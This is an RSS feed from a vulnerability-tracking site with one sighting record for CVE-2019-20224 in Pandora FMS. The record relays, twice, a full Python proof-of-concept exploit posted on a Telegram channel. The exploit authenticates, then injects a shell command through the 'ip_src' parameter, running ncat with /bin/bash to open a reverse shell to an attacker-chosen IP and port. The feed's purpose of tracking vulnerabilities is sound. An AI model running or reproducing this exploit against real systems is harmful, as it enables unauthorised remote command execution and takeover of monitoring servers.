<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the 10 most recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 06 May 2026 03:12:07 +0000</lastBuildDate>
    <item>
      <!-- One sighting record. The title is the sighting UUID and the link is its export URL.
           The description and content:encoded elements that follow both carry the same
           JSON-serialised sighting object (uuid, vulnerability_lookup_origin, author,
           vulnerability, type, source, content, creation_timestamp).
           NOTE(review): the "content" field appears to be text relayed from the third-party
           "source" URL, so consumers should handle it as untrusted data: parse it as JSON,
           escape it before display, and never render it as markup or execute it. -->
      <title>9deff425-22e5-4ba0-ab12-bdb93ef1d349</title>
      <link>https://vulnerability.circl.lu/sighting/9deff425-22e5-4ba0-ab12-bdb93ef1d349/export</link>
      <description>{"uuid": "9deff425-22e5-4ba0-ab12-bdb93ef1d349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-20224", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/1667", "content": "*INDO GHOST SECURITY*\n\n*CVE-2019-20224*\nsource: https://cxsecurity.com/issue/WLB-2020010094\n\n\n# Date: 2019-11-14\n# Exploit Author: Askar (@mohammadaskar2)\n# CVE: CVE-2019-20224\n# Vendor Homepage: https://pandorafms.org/\n# Software link: https://pandorafms.org/features/free-download-monitoring-software/\n# Version: v7.0NG\n# Tested on: CentOS 7.3 / PHP 5.4.16\n\n\n\n\n#!/usr/bin/python3\n\nimport requests\nimport sys\n\nif len(sys.argv) !=3D 6:\n    print(\"[+] Usage : ./exploit.py target username password ip port\")\n    exit()\n\ntarget =3D sys.argv[1]\nusername =3D sys.argv[2]\npassword =3D sys.argv[3]\nip =3D sys.argv[4]\nport =3D int(sys.argv[5])\n\nrequest =3D requests.session()\n\nlogin_info =3D {\n    \"nick\": username,\n    \"pass\": password,\n    \"login_button\": \"Login\"\n}\n\nlogin_request =3D request.post(\n    target+\"/pandora_console/index.php?login=3D1\",\n    login_info,\n    verify=3DFalse,\n    allow_redirects=3DTrue\n )\n\nresp =3D login_request.text\n\nif \"User not found in database\" in resp:\n    print(\"[-] Login Failed\")\n    exit()\nelse:\n    print(\"[+] Logged In Successfully\")\n\nprint(\"[+] Sending crafted graph request ..\")\n\nbody_request =3D {\n    \"date\": \"0\",\n    \"time\": \"0\",\n    \"period\": \"0\",\n    \"interval_length\": \"0\",\n    \"chart_type\": \"netflow_area\",\n    \"max_aggregates\": \"1\",\n    \"address_resolution\": \"0\",\n    \"name\": \"0\",\n    \"assign_group\": \"0\",\n    \"filter_type\": \"0\",\n    \"filter_id\": \"0\",\n    \"filter_selected\": \"0\",\n    \"ip_dst\": \"0\",\n    \"ip_src\": '\";ncat -e /bin/bash {0} {1} #'.format(ip, port),\n    \"draw_button\": 
\"Draw\"\n}\n\ndraw_url =3D target + \"/pandora_console/index.php?sec=3Dnetf&amp;amp;sec2=3Doperati=\non/netflow/nf_live_view&amp;amp;pure=3D0\"\nprint(\"[+] Check your netcat ;)\")\nrequest.post(draw_url, body_request)\n\n\nPstar8999", "creation_timestamp": "2020-01-18T13:24:25.000000Z"}</description>
      <content:encoded>{"uuid": "9deff425-22e5-4ba0-ab12-bdb93ef1d349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-20224", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/1667", "content": "*INDO GHOST SECURITY*\n\n*CVE-2019-20224*\nsource: https://cxsecurity.com/issue/WLB-2020010094\n\n\n# Date: 2019-11-14\n# Exploit Author: Askar (@mohammadaskar2)\n# CVE: CVE-2019-20224\n# Vendor Homepage: https://pandorafms.org/\n# Software link: https://pandorafms.org/features/free-download-monitoring-software/\n# Version: v7.0NG\n# Tested on: CentOS 7.3 / PHP 5.4.16\n\n\n\n\n#!/usr/bin/python3\n\nimport requests\nimport sys\n\nif len(sys.argv) !=3D 6:\n    print(\"[+] Usage : ./exploit.py target username password ip port\")\n    exit()\n\ntarget =3D sys.argv[1]\nusername =3D sys.argv[2]\npassword =3D sys.argv[3]\nip =3D sys.argv[4]\nport =3D int(sys.argv[5])\n\nrequest =3D requests.session()\n\nlogin_info =3D {\n    \"nick\": username,\n    \"pass\": password,\n    \"login_button\": \"Login\"\n}\n\nlogin_request =3D request.post(\n    target+\"/pandora_console/index.php?login=3D1\",\n    login_info,\n    verify=3DFalse,\n    allow_redirects=3DTrue\n )\n\nresp =3D login_request.text\n\nif \"User not found in database\" in resp:\n    print(\"[-] Login Failed\")\n    exit()\nelse:\n    print(\"[+] Logged In Successfully\")\n\nprint(\"[+] Sending crafted graph request ..\")\n\nbody_request =3D {\n    \"date\": \"0\",\n    \"time\": \"0\",\n    \"period\": \"0\",\n    \"interval_length\": \"0\",\n    \"chart_type\": \"netflow_area\",\n    \"max_aggregates\": \"1\",\n    \"address_resolution\": \"0\",\n    \"name\": \"0\",\n    \"assign_group\": \"0\",\n    \"filter_type\": \"0\",\n    \"filter_id\": \"0\",\n    \"filter_selected\": \"0\",\n    \"ip_dst\": \"0\",\n    \"ip_src\": '\";ncat -e /bin/bash {0} {1} #'.format(ip, port),\n    \"draw_button\": 
\"Draw\"\n}\n\ndraw_url =3D target + \"/pandora_console/index.php?sec=3Dnetf&amp;amp;sec2=3Doperati=\non/netflow/nf_live_view&amp;amp;pure=3D0\"\nprint(\"[+] Check your netcat ;)\")\nrequest.post(draw_url, body_request)\n\n\nPstar8999", "creation_timestamp": "2020-01-18T13:24:25.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/9deff425-22e5-4ba0-ab12-bdb93ef1d349/export</guid>
      <pubDate>Sat, 18 Jan 2020 13:24:25 +0000</pubDate>
    </item>
  </channel>
</rss>
